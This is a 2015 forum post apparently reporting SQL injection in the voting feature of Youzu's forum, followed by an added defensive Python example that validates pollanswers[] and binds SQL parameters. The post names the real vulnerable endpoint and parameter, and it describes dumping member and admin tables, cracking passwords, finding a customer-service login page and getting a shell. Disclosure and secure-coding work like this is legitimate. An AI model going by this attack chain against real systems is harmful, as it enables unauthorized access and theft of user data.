This post was last edited by T4rk on 2015-7-2 22:02
 
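The injection is in the forum. Because Youzu consolidated all member data into the bbs (passport), the injection can be used to dump member data.

In addition, the front-end login can redirect to the back-end admin panel, so there is no need to even look for the admin path.
The vulnerability is in the voting feature.
http://bbs.youzu.com/post/index/id/475258
POST data: pollanswers[]=SQLi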
 
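The table listing (partial) includes cms_admin and kf_member.
At first I injected admin and found that some of the passwords could not be cracked.
Later, after digging around, I found kf_members, and then used Google hacking to find the back end:
http://kf.uuzuonline.com/site/login
There are n customer-service accounts to crack slowly. Then I suddenly found that a customer-service account can also getshell.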
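
Added example, not part of the original post and not Youzu's code: one way a vote handler can treat the array-valued `pollanswers[]` parameter safely, by validating every element as an integer id and passing it to SQL only as a bound parameter. The schema (`poll_options`, `poll_votes`), the function names and the `MAX_CHOICES` limit are assumptions, and SQLite stands in for the forum's database.

```python
import sqlite3

MAX_CHOICES = 10  # assumed upper bound on options selectable in one vote


def parse_poll_answers(raw_values):
    """Validate each element of pollanswers[] as a non-negative integer id."""
    if not isinstance(raw_values, (list, tuple)) or not raw_values:
        raise ValueError("pollanswers[] must be a non-empty list")
    if len(raw_values) > MAX_CHOICES:
        raise ValueError("too many answers")
    ids = set()
    for value in raw_values:
        text = str(value)
        # ASCII digits only: rejects signs, spaces, quotes and Unicode digits
        if len(text) > 9 or not (text.isascii() and text.isdecimal()):
            raise ValueError("invalid option id")
        ids.add(int(text))
    return sorted(ids)


def record_vote(conn, poll_id, user_id, raw_values):
    """Store a vote; request values reach SQL only as bound parameters."""
    ids = parse_poll_answers(raw_values)
    marks = ",".join("?" for _ in ids)  # one placeholder per validated id
    rows = conn.execute(
        "SELECT id FROM poll_options WHERE poll_id = ? AND id IN (%s)" % marks,
        [poll_id, *ids],
    ).fetchall()
    if len(rows) != len(ids):
        raise ValueError("option does not belong to this poll")
    with conn:  # commits on success, rolls back on error
        conn.executemany(
            "INSERT INTO poll_votes (poll_id, option_id, user_id) VALUES (?, ?, ?)",
            [(poll_id, option_id, user_id) for option_id in ids],
        )
    return ids


def demo_db():
    """Constructed in-memory schema and rows, for illustration only."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE poll_options (id INTEGER PRIMARY KEY, poll_id INTEGER);"
        "CREATE TABLE poll_votes (poll_id INTEGER, option_id INTEGER, user_id INTEGER);"
        "INSERT INTO poll_options VALUES (1, 7), (2, 7), (3, 8);"
    )
    return conn
```

The only string formatted into the query is the run of `?` placeholders, whose length depends on the count of validated ids and never on their content.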